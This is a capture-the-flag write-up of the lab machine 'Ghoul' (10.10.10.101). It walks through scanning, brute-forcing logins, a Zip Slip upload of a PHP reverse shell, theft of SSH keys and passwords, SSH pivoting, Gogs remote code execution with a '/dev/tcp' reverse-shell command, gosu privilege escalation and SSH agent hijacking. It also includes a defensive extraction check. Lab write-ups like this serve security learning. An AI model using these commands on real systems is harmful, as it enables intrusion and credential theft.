Ghoul – 10.10.10.101

Let's start off with a basic but efficient nmap scan, after adding ghoul.htb to our hosts file.

First let's sweep all the ports using the -Pn -p- flags:

nmap -Pn -p- ghoul.htb
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-19 08:12 EDT
Nmap scan report for ghoul.htb (10.10.10.101)
Host is up (0.939s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
2222/tcp open  EtherNetIP-1
8080/tcp open  http-proxy

Then let's run script and version detection on those ports using -sC -sV -A -Pn -p x,x,x…

nmap -sC -sV -A -Pn -p 22,80,2222,8080 ghoul.htb
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-19 08:30 EDT
Nmap scan report for ghoul.htb (10.10.10.101)
Host is up (0.031s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f9:bc:... (RSA)
|_  256 ... (ECDSA)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Aogiri Tree
2222/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 fb:3b:... (RSA)
|   256 ... (ECDSA)
|_  256 ... (ED25519)
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Aogiri
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88 - Error report
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Asus RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 - 4.11 (93%), Linux 3.13 (93%), DD-WRT v3.0 (Linux 4.4.2) (93%), Linux 4.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 2222/tcp)
HOP RTT      ADDRESS
1   28.26 ms 10.10.14.1
2   28.80 ms ghoul.htb (10.10.10.101)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Okay, so far we have two SSH ports and two websites.

Let's see which one we should focus on.

Port 80: the "Aogiri Tree" site, with a navigation bar (Home, Ghoul Society, Contacts, Members).

Port 8080: a browser prompt "Authentication Required: http://ghoul.htb:8080 is requesting your username and password. The site says: "Aogiri"", with Username and Password fields.

I think it’s obvious we have to start at port 80.

Let's get dirb running while we spider around in the meantime.

We see this at the bottom of the site: a "Designed by" footer credit.

We played around on the site for a bit, but nothing has come up yet. Desperate for something, we start a brute-force attack on the two logins.

Using a wordlist generated from the website itself: cewl http://ghoul.htb/ > dict.txt

Now we use that wordlist against ghoul.htb/users/login.php and ghoul.htb:8080.

It worked for ghoul.htb:8080:

Admin/admin -> LOLOL

Okay, we got in.

The page at ghoul.htb:8080 is a "SIERRA" site template (Home, About Us, Services, Portfolio, Blog, Contact) with two upload forms: "Upload images here! Choose image to upload to server" and "Upload a zip if you have many images. Choose zip to upload to server".

We can upload zip and jpeg files here! Nice.

Let’s do some research on how we can deal with this

By querying “zip upload vulnerability” and “jpeg upload vulnerability” we can get a lot of good information.

The first result for zip gives us the Zip Slip vulnerability, so we dig deeper to see what it does.

In a nutshell, attackers can create Zip archives that use path traversal to overwrite important files on affected systems, either destroying them or replacing them with malicious alternatives.
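The extraction-side check that this description calls for, as an added example (not code from the write-up or from evilarc): a Python extractor that normalises each member name and refuses anything that would land outside the destination directory, exercised against a constructed archive shaped like the one built later on this page (eight "../" followed by /var/www/html/rival.php). The function names and the sample members are assumptions.

```python
import io
import tempfile
import zipfile
from pathlib import Path

# Constructed sample archive: one benign member plus one shaped like the evilarc
# output on this page (eight "../" then /var/www/html/rival.php).
def build_sample_archive() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("images/logo.jpg", b"\xff\xd8\xff\xe0 not a real jpeg")
        zf.writestr("../" * 8 + "/var/www/html/rival.php", b"<?php /* placeholder */")
    return buf.getvalue()

# True when the member name, once normalised, lands outside root: resolving
# also catches absolute names and pre-existing symlinks, unlike a ".." check.
def entry_escapes(root: Path, name: str) -> bool:
    root = root.resolve()
    target = (root / name).resolve()
    try:
        target.relative_to(root)
    except ValueError:
        return True
    return False

# Extract only members that stay inside dest; returns (extracted, rejected).
# The check runs before any write, the step a zip-slip-vulnerable uploader skips.
def safe_extract(archive: bytes, dest: Path) -> tuple[list[str], list[str]]:
    extracted, rejected = [], []
    dest.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            if entry_escapes(dest, info.filename):
                rejected.append(info.filename)
                continue
            out = dest / info.filename
            if info.is_dir():
                out.mkdir(parents=True, exist_ok=True)
            else:
                out.parent.mkdir(parents=True, exist_ok=True)
                out.write_bytes(zf.read(info))
            extracted.append(info.filename)
    return extracted, rejected

# Run the sample through safe_extract in a scratch directory and report.
def run_demo() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        dest = Path(tmp) / "uploads"
        extracted, rejected = safe_extract(build_sample_archive(), dest)
        return {
            "extracted": extracted,
            "rejected": rejected,
            "logo_on_disk": (dest / "images" / "logo.jpg").is_file(),
        }
```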

Could be something; let's search for some exploits for this.

https://github.com/ptoomey3/evilarc

By reading it we know what to do.

We need a reverse shell, zip it using the evilarc.py script and then upload it.

The evilarc script takes the following parameters:

python evilarc.py --help
Usage: evilarc <input file>

Create archive containing a file with directory traversal

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -f OUT, --output-file=OUT
                        File to output archive to. Archive type is based off
                        of file extension. Supported extensions are zip, jar,
                        tar, tar.bz2, tar.gz, and tgz. Defaults to evil.zip.
  -d DEPTH, --depth=DEPTH
                        Number directories to traverse. Defaults to 8.
  -o PLATFORM, --os=PLATFORM
                        OS platform for archive (win|unix). Defaults to win.
  -p PATH, --path=PATH  Path to include in filename after traversal.

Where <input file> is the reverse shell we got from pentestmonkey.

-p is the path where the shell will be stored: the html folder, so we can execute it from the web server.

--os=unix: the default is win, and Windows paths work differently, so we need to change it.

The default depth of 8 seems enough, so we leave it as it is.

python evilarc.py rival.php -p /var/www/html --os=unix
Creating evil.zip containing ../../../../../../../..//var/www/html/rival.php
evilarc.py:73: UserWarning: Duplicate name: '../../../../../../../..//var/www/html/rival.php'
  zf.write(fname, zpath)

An ls -la of the evilarc directory afterwards shows .git, README.md, evilarc.py, evil.zip, rival.php and rival.zip.

So after we have uploaded the zip file on the website, the malicious archive will 'place' the rival.php script on the web server.

*Note this is on port 80, since the default directory is /var/www/html.

We can trigger the script by just browsing to it:

ghoul.htb/rival.php

Now we should have a shell as www-data:

nc -lvp 8844
listening on [any] 8844 ...
connect to [10.10.14.16] from ghoul.htb [10.10.10.101] 39204
Linux Aogiri 4.15.0-45-generic #48-Ubuntu SMP Tue Jan 29 ... UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 ... up 25 min,  2 users,  load average: 0.00, 0.01, 0.08
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
kaneki   pts/0    10.10.14.16      22:28    17:20  0.04s  0.04s -bash
noro     pts/2    ...14.24         22:36    1:28   ...    ...   -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

First we spawn a TTY shell:

$ python -c 'import pty; pty.spawn(...)'

Now let’s look around

www-data@Aogiri:/var$ ls
backups  cache  docs  lib  local  lock  log  mail  opt  run  spool  tmp
www-data@Aogiri:/var$ cd backups/backups
www-data@Aogiri:/var/backups/backups$ ls
Important.pdf  keys  note.txt  sales.xlsx
www-data@Aogiri:/var/backups/backups$ cd keys
www-data@Aogiri:/var/backups/backups/keys$ ls -la
total 24
(three root-owned files dated Dec 13 2018: eto.backup (1675 bytes), kaneki.backup (1766 bytes) and noro.backup (1675 bytes))

After looking at the three files we figure that kaneki's is the most important one, because that one is encrypted.

After downloading it to our own machine we set the permissions right so we can use the file:

chmod 400 kan_rsa
ssh -i kan_rsa kaneki@ghoul.htb
Enter passphrase for key 'kan_rsa':

We need a passphrase *because* it is encrypted, so let's continue the search for a password in our www-data shell.

Btw, you can also copy the RSA files of the other two users to get an SSH shell as them. We decided not to do that and went for the password to get a shell as kaneki.

So we navigate around and see some juice

www-data@Aogiri:/var/www/html$ ls
archives  blog.html  contact.html  eto.jpg  images  index.html  js  kaneki-ken.jpg  kaneki.html  kaneki.jpg  ken.jpg  less  noro.jpg  rival.php  rival.zip  secret.php  upload  users

secret.php stands out.

After reading it a few times we understand what's going on here and see something potentially great.

That ILoveTouka ❤ could be the password of kaneki; let's try that.

ssh -i kan_rsa kaneki@ghoul.htb
Enter passphrase for key 'kan_rsa':
Last login: Wed Jun 19 22:28:35 2019 from 10.10.14.16
kaneki@Aogiri:~$

Password was 'ILoveTouka'.

Here we get user:

kaneki@Aogiri:~$ ls
note.txt  notes  secret.jpg  user.txt
kaneki@Aogiri:~$ cat user.txt
7c0f11041f210f4f7d1711d40a1c35c2

ONTO ROOT

As kaneki, connected through SSH, we download a linuxprivchecker.py script from our own web server and run it.

Nothing special here.

If we do ifconfig:

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.20.0.10  netmask 255.255.0.0  broadcast 172.20.255.255
        ether ...  txqueuelen 0  (Ethernet)
        RX packets 19392  bytes 9620944 (9.6 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 17680  bytes 10909769 (10.9 MB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2691  bytes 7225037 (7.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2691  bytes 7225037 (7.2 MB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

Here we can see there are two interfaces, which means there is probably another computer on the other end of the connection.

We download the nmap static binaries and get them onto the box using wget from our own web server.

We see another machine: 

172.20.0.150 -> kaneki-pc

After some more enumeration we learn about the user kaneki_pub.

Let's try something simple: ssh into kaneki-pc with the password ILoveTouka.

kaneki@Aogiri:~$ ssh kaneki_pub@172.20.0.150
Enter passphrase for key '/home/kaneki/.ssh/id_rsa':
Last login: Thu Jun 20 10:19:... from ...

Here we see a to-do in note.txt:

"Give AogiriTest user access to Eto for git."

-> that's a username we could use later, maybe.

On this PC we see yet another network interface:

kaneki_pub@kaneki-pc:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.20.0.150  netmask 255.255.0.0  broadcast 172.20.255.255
        ether 02:42:ac:14:00:96  txqueuelen 0  (Ethernet)
        RX packets 15740  bytes 10697359 (10.6 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 12989  bytes 8891668 (8.8 MB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.18.0.200  netmask 255.255.0.0  broadcast 172.18.255.255
        ether ...  txqueuelen 0  (Ethernet)
        RX packets 3573  bytes 7297875 (7.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4649  bytes 759391 (759.3 KB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

Let’s see what we can find in that subnet

./nmap -sn 172.18.0.0/24
Starting Nmap 7.11 ( https://nmap.org ) at 2019-06-20 13:27 UTC
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for Aogiri (172.18.0.1)
Host is up (0.000635s latency).
Nmap scan report for cuff_web_1.cuff_default (172.18.0.2)
Host is up (0.00046s latency).
Nmap scan report for kaneki-pc (172.18.0.200)
Host is up (0.000051s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.61 seconds

Since we are the .200 and the .1 will be the routing device (or whatever), we are most interested in that .2; let's check some things.

./nmap -Pn -p1-5000 172.18.0.2
Starting Nmap 7.11 ( https://nmap.org ) at 2019-06-20 13:21 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for cuff_web_1.cuff_default (172.18.0.2)
Host is up (0.000205s latency).
Not shown: 4998 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  unknown

That port 3000 needs some confirmation; even after a service scan it didn't reveal anything.

Let's try making a tunnel from our machine to 172.18.0.2 so we can open that port 3000 in our browser.

  1. Make a tunnel from our local machine at port 1234 to port 3000, connected to kaneki using our previously 'stolen' id_rsa:

ssh kaneki@ghoul.htb -i kan_rsa -L 1234:127.0.0.1:3000

  2. Then, in the shell that just popped open, make the tunnel to where the unknown service is running:

ssh -L 3000:172.18.0.2:3000 kaneki_pub@172.20.0.150

  3. We can now browse in Firefox to localhost:1234.

ssh kaneki@ghoul.htb -i kan_rsa -L 1234:127.0.0.1:3000
Enter passphrase for key 'kan_rsa':
bind [127.0.0.1]:1234: Address already in use
channel_setup_fwd_listener_tcpip: cannot listen to port: 1234
Could not request local forwarding.
Last login: Thu Jun 20 2019 from 10.10.14.16
kaneki@Aogiri:~$ ssh -L 3000:172.18.0.2:3000 kaneki_pub@172.20.0.150
Enter passphrase for key '/home/kaneki/.ssh/id_rsa':
Last login: Thu Jun 20 2019 from 172.20.0.10

On the web page we see a login form at localhost:1234/user/login, with Home / Explore / Help navigation and a "Sign In" form (Username or email, Password, Remember Me, Forgot password?).

Getting the login:

aogiriTest could be the username here; let's keep that in mind.

The password is visible here:

kaneki@Aogiri:/usr/share/tomcat7$ grep -r pass -> nice trick to search for passwords in a bunch of files

aogiriTest/test@aogiri123 -> creds to log in at localhost:1234

We got into the web page, a clean repo…

The dashboard at localhost:1234 for AogiriTest: Issues, Pull Requests, Explore; My Repositories (0), Collaborative Repositories; options to create a Repository, Organization or Mirror.

What can we do with an empty git?

Found a script to get RCE:

https://github.com/TheZ3ro/gogsownz

The options of this script are:

usage: gogsownz [-h] [-C CREDS] [-n COOKIENAME] [-c COOKIE] [-i] [--rce RCE]
                [--repo REPO] [--preauth] [--windows] [--cleanup] [--tor]
                [--check-tor] [--burp] [-k] [--verbose]
                url

positional arguments:
  url                   URL for the Gogs server

optional arguments:
  -h, --help            show this help message and exit
  -C CREDS, --creds CREDS
                        Credentials for the Gogs server, in the form
                        "username:password"
  -n COOKIENAME, --cookie-name COOKIENAME
                        Name of the Gogs-specific session cookie
  -c COOKIE, --cookie COOKIE
                        Session for the Gogs server, the value in the Cookie
  -i, --info            Only detect informations about the running Gogs
                        server, then quit
  --rce RCE             Command to execute on the Gogs server
  --repo REPO           Use an existing repo for the PrivEsc
  --preauth             Try the pre-auth vulnerability
  --windows             Gogs server runs on Windows
  --cleanup             Remove all created repo after exploit
  --tor                 Use tor proxy when performing requests
  --check-tor           Check that Tor is correctly set up before running
  --burp                Use burp proxy when performing requests
  -k, --insecure        Allow insecure server connections when using SSL
  --verbose, -v

We did some trial and error on the local machine while the listener was running.

This did the trick eventually:

python3 gogsownz.py http://127.0.0.1:1234/ --creds AogiriTest:'test@aogiri123' --rce 'bash -c "bash -i >& /dev/tcp/10.10.14.16/8845 0>&1"' --cleanup -v -n i_like_gogits

We get a connection in our listener:

bash-4.4$ whoami
whoami

We are now in a shell on the 172.18.0.2 box:

bash-4.4$ ifconfig
eth0      Link encap:Ethernet  HWaddr ...
          inet addr:172.18.0.2  Bcast:172.18.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3094 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1805 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:357584 (349.2 KiB)  TX bytes:5971384 (5.6 MiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:400 errors:0 dropped:0 overruns:0 frame:0
          TX packets:400 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:...
          RX bytes:46600 (45.5 KiB)  TX bytes:46600 (45.5 KiB)

We need something useful here but aren't sure where to look; maybe look around for ways to privesc.

Found a SUID binary we can exploit here:

/usr/sbin/gosu root bash -c 'su -' /bin/sh -i

bash-4.4$ /usr/sbin/gosu root bash -c /bin/sh -i
/bin/sh: can't access tty; job control turned off
# ls
aogiri-app.7z  session.sh  su

session.sh looks like an interesting file; let's look.

Content of session.sh:

3713ea5e4353:/root# cat session.sh
#!/bin/bash
while true
do
  sleep 300
  rm -rf /data/gogs/data/sessions
  sleep 2
  curl -d 'user_name=kaneki&password=12345ILoveTouka!!!' http://172.18.0.2:3000/user/login
done

We also see a 7z file, compressed data.

After downloading it too, we extracted the archive using: 7z x aogiri-app.7z

We got some dirs, so we went looking in all of them.

.git# cat ORIG_HEAD
0d426b533d4f1877f8a114620be8a1294f34ab71

This hash could be used to do a checkout of the git repo:

git checkout <hash>

After this, the previous wrong password we saw suddenly changed:

cat application.properties
server.port=8080
spring.datasource.url=jdbc:mysql://localhost:3306/db
spring.datasource.username=root
spring.datasource.password=7^Grc%C\7xEQ?tb4
server.address=0.0.0.0

Let's try that root password on some boxes.

The kaneki-pc seems to do it:

kaneki_pub$ su -
Password: 7^Grc%C\7xEQ?tb4

After doing this we are root on the kaneki-pc.

Yet we found this in root.txt:

root@kaneki-pc:~# cat root.txt
You've done well to come upto here human. But what you seek doesn't lie here. The journey isn't over yet.

We are not done yet apparently.

Here we can find information about the kind of exploit we will be using:

http://blog.7elements.co.uk/2012/04/ssh-agent-abusing-trust-part-1.html?m=1

So basically, whenever someone connects using SSH, something gets saved in the tmp folders. The values saved there can be misused by us to get root.

Doing this manually requires a lot of attention, so we decided to write a script:

./sshup.sh -> wait for some time and we got root

Last login: Thu Jun 20 2019 from 172.18.0.2
# ls
log.sh  root.txt
# cat root.txt
7c0f11041f210f4fadff7c077539e72f

Overall a SUPER awesome box, learned a lot of new stuff!

It was worth the time and effort!